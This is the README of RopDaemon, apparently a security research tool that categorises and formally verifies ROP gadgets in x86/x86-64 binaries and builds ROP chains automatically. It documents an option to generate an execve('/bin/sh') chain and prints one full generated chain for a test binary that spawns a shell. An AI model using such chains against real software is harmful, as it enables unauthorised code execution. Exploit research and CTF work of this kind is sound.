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A fast, multithreaded, ROP-gadget semantics analyzer.

RopDaemon collects and analyses all the ROP gadgets in a program and assigns them a gadget category and multiple metadata, including:

  • The address and the opcodes in the gadget
  • The basic operation performed by the gadget, and the registers involved
  • The registers invalidated/clobbered by the gadget
  • The effect of the gadget on the stack pointer
  • If the gadget accesses memory and how

Moreover, RopDaemon can reason on the gadgets by automatically crafting non-trivial ropchains. It supports x86 and x86-64 binaries.

Gadget Categorization

LoadConst Load constant value into a register pop rax; ret
ClearReg Set to zero a register xor rax, rax; ret
MovReg Copy value from a register to a register mov rax, rcx; ret
UnOp Unary arithmetic/logical oper. over a register inc rax; ret
BinOp Binary arithmetic/logical oper. over registers add rax, rbx; ret
ReadMem Read value from memory mov rax, qword ptr [rcx + 8]; ret
WriteMem Write value into memory mov qword ptr [rcx + 8], rax; ret
ReadMemOp Binary operation with memory input add rax, qword ptr [rcx + 8]; ret
WriteMemOp Binary operation with memory output add qword ptr [rcx + 0x10], rax; ret
StackPtrOp Alter stack pointer value add rsp, 8; ret
Other Any other operation syscall; ret

Gadgets are initially collected by ropper. All valid gadgets are executed under unicorn using random input values in the registers. This allows RopDaemon to collect the gadgets that are candidates for interesting operations. All the others are quickly discarded.

RopDaemon verifies only the interesting gadgets using the angr framework.

Chain crafting

RopDaemon is able to craft non-trivial ropchains using graph based algorithms. It supports setting registers to fixed values, writing to memory, calling functions and syscalls.

It creates a graph based on gadgets dependencies to express the effect each gadget execution has on the registers/memory state, including registers that must be valid (since dereferenced) and registers clobbered by the gadget execution. A query is then a simple visit on the graph.


$ python3 install


$ ropd --help                                                                                                                                                                                           
usage: ropd [-h] [-c] [-v] [-e] [-d] [-j] [--stats] binary

This is RopDaemon, a fast rop-gadget compiler

positional arguments:
  binary         input binary

optional arguments:
  -h, --help     show this help message and exit
  -c, --collect  collect and categorize gadgets
  -v, --verify   formally verify collected gadgets
  -e, --execve   generate a ropchain to perform an execve("/bin/sh") syscall
  -d, --dump     dump gadgets file to a readable format
  -j, --json     dump gadgets file to json format
  --stats        statistics about verified gadgets
  • Run ropd -cv <binary> to collect and verify the gadgets in <binary>. Collection and Verification phases have to be run just once per binary. RopDaemon will create a <binary>.collected and <binary>.verified file to cache the results.
  • Run ropd -j <binary> to dump a json file with all the verified gadgets for <binary>.
  • Run ropd -e <binary> to produce an execve("/bin/sh") chain from <binary>.


$ ropd -cve test/baby_stack
100%|██████████████████████| 12314/12314 [00:33<00:00, 366.67it/s]
Found 2318 different typed gadgets
Collected gadgets saved in test/baby_stack.collected
100%|██████████████████████| 2055/2055 [00:21<00:00, 96.91it/s]
Found 1841 different verified gadgets
Verified gadgets saved in test/baby_stack.verified
[+] found best guesses for: ['rax', 'rcx', 'rsi', 'rbp', 'rbx', 'rdx', 'rdi']
[+] computing sequence

rebase = lambda x : p64(x + IMAGE_BASE)

rop = ''
rop += rebase(0x4016ea) # pop rax; ret
rop += p64(0x5a6830)
rop += rebase(0x409d68) # pop rbx; and byte ptr [rax + 1], cl; ret
rop += p64(0x5bf058)
rop += rebase(0x43730f) # pop rbp; ret
rop += p64(0x68732f6e69622f) # "/bin/sh\x00"
rop += rebase(0x40631a) # mov qword ptr [rbx], rbp; ret
rop += rebase(0x470931) # pop rdi; or byte ptr [rax + 0x39], cl; ret
rop += p64(0x5bf058)
rop += rebase(0x46ec93) # pop rdx; adc byte ptr [rax - 1], cl; ret
rop += p64(0x0)
rop += rebase(0x4016ea) # pop rax; ret
rop += p64(0x3b)
rop += rebase(0x46defd) # pop rsi; ret
rop += p64(0x0)
rop += rebase(0x456889) # syscall ; ret


A fast, multithreaded, ROP-gadget semantics analyzer.







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